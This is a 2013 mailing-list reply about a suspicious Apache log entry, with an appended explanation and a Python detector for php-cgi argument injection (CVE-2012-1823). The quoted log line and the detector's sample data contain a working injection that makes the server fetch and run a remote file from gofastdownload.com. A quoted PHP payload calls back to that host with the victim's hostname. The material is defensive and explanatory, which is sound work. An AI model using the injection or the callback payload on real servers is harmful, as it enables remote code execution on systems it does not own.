[OT] server log entry?
Richard Gaskin
ambassador at fourthworld.com
Fri May 24 12:51:12 EDT 2013
Thierry Douez wrote:
> Here is the line:
>
> 193.107.17.36 ... "GET /?-n+-dallow_url_include%3DOn+-dauto_prepend_file%3Dhttp://gofastdownload.com/rf/s.txt HTTP/1.1" 200 6027 "-" "Python-urllib/2.6"
>
> The file ../rf/s.txt contains:
>
> <?php file_get_contents('http://gofastdownload.com/rf/s.php?d='.$_SERVER['HTTP_HOST']); exit(0); ?>
>
> The IP points to the middle of nowhere in Russia.
>
> and finally I know nothing about php.
...
> If someone has some more precise answer, I'm still interested :)
I don't have anything more specific on that, but I find it interesting
that it appears to have been successful (result code 200).
On most Apache and auth logs you'll find a great many attempts at all
sorts of exploits, and most fail simply because the file they're looking
for isn't there, or has been adequately protected against such attacks.
As a general rule I try to stay current with all server components
(MySQL, PHP, any frameworks like WordPress, Drupal, etc.), and most of
the time staying current blocks malicious bots.
That said, security is an ongoing process of cat and mouse, and no
matter how frequently system components are updated there's always some
new exploit being devised and deployed.
I don't know enough about Python or your system setup to suggest how to
prevent that specific attack, but in general if you move your CGI
engines outside of the public HTML folder, lock down permissions as
tightly as practical, and religiously sanitize inputs you can greatly
minimize such risks.
One more thing in favor of LiveCode Server: until LC really takes off
we get a minor benefit from "security by obscurity" - that is, it simply
isn't worth most attackers' time to target LC because it's seldom used
on the Web.
Moreover, the LC engine has historically been immune to buffer overruns,
so a wide range of potential exploits that have affected other
components are very unlikely to affect LC.
And being a very readable language, it's often easier to maintain good
sanitization practices with LC.
--
Richard Gaskin
Fourth World
LiveCode training and consulting: http://www.fourthworld.com
Webzine for LiveCode developers: http://www.LiveCodeJournal.com
Follow me on Twitter: http://twitter.com/FourthWorldSys
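The request Thierry quoted is the php-cgi query-string argument injection fixed in 2012 (CVE-2012-1823): when the raw query string contains no literal "=", the CGI rules hand it to php-cgi as command-line switches, so "-dallow_url_include=On -dauto_prepend_file=http://..." makes php-cgi fetch and run a remote file before every page. The script below, added here as an example and not code from the original post or from the LiveCode project, parses Apache combined-format log lines, reconstructs the argv php-cgi would have seen, and flags entries that set dangerous ini directives. The three log lines are constructed (the first reproduces the shape of Thierry's entry with the IP and URL from the post; the timestamps and the two benign lines are made up), and all function names are this example's own.

```python
"""Detect php-cgi query-string argument injection in Apache access logs.

Added example, not code from the original mailing-list post. SAMPLE_LOG is
constructed: line 1 mirrors the entry quoted in the thread, lines 2 and 3
are ordinary requests used as negatives. Function names are this example's own.
"""
import re
from urllib.parse import unquote

# Apache "combined" format: host ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# ini directives that turn php-cgi switch injection into code execution or
# disable protections. allow_url_include plus auto_prepend_file pointing at
# an attacker URL is the classic pair seen in the quoted log line.
DANGEROUS_DIRECTIVES = ("allow_url_include", "auto_prepend_file",
                        "auto_append_file", "disable_functions", "open_basedir")

# Constructed sample log (timestamps and the last two lines are invented).
SAMPLE_LOG = """\
193.107.17.36 - - [24/May/2013:06:10:02 -0400] "GET /?-n+-dallow_url_include%3DOn+-dauto_prepend_file%3Dhttp://gofastdownload.com/rf/s.txt HTTP/1.1" 200 6027 "-" "Python-urllib/2.6"
203.0.113.7 - - [24/May/2013:06:11:15 -0400] "GET /search?q=livecode+server&page=2 HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
198.51.100.9 - - [24/May/2013:06:12:40 -0400] "GET /index.php HTTP/1.1" 200 6027 "-" "curl/7.29.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def cgi_argv(target):
    """Return the argv php-cgi would derive from the request target's query
    string, or [] for a normal key=value query.

    CGI rule: only a query with no literal '=' is split on '+' into arguments,
    and each piece is URL-decoded afterwards. That is why the attacker writes
    %3D instead of '=': the web server still sees a query without '='."""
    if "?" not in target:
        return []
    raw_query = target.partition("?")[2]
    if not raw_query or "=" in raw_query:
        return []
    return [unquote(a) for a in raw_query.split("+") if a]


def assess(line):
    """Classify one log line. Returns None for benign or unparseable lines,
    otherwise a dict with the injected switches, the dangerous directives they
    set, and whether a remote prepend/append file was requested."""
    entry = parse_line(line)
    if entry is None:
        return None
    argv = cgi_argv(entry["target"])
    # Only flag when every argument looks like a switch; "?foo+bar" is just a
    # quirky indexed query, not an injection.
    if not argv or not all(a.startswith("-") for a in argv):
        return None
    settings = [a[2:] for a in argv if a.startswith("-d")]  # "name=value" strings
    names = [s.split("=", 1)[0] for s in settings]
    directives = [n for n in names if n in DANGEROUS_DIRECTIVES]
    remote_file = any(
        re.match(r"auto_(prepend|append)_file=[a-z][a-z0-9+.-]*://", s) for s in settings
    )
    return {
        "host": entry["host"],
        "user_agent": entry["ua"],
        "status": int(entry["status"]),
        "size": entry["size"],
        "argv": argv,
        "dangerous_directives": directives,
        "remote_file": remote_file,
    }


def scan(log_text):
    """Run assess() over a whole log and return only the suspicious entries."""
    return [r for r in (assess(l) for l in log_text.splitlines()) if r]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['host']} status={hit['status']} size={hit['size']} "
              f"directives={hit['dangerous_directives']} remote_file={hit['remote_file']}")
        print("  argv:", hit["argv"])
```

A 200 on its own only shows the server answered; it does not prove the payload ran. The prepended script in the thread calls exit(0) before any page output, so a successful injection would have produced an empty body, and the 6027-byte response looks more like the normal page being served. If the scan does flag a hit, the checks worth doing are: is php-cgi (rather than mod_php or php-fpm) actually in the request path, is it patched, and do outbound connection or DNS logs show the host named in auto_prepend_file being contacted from the server.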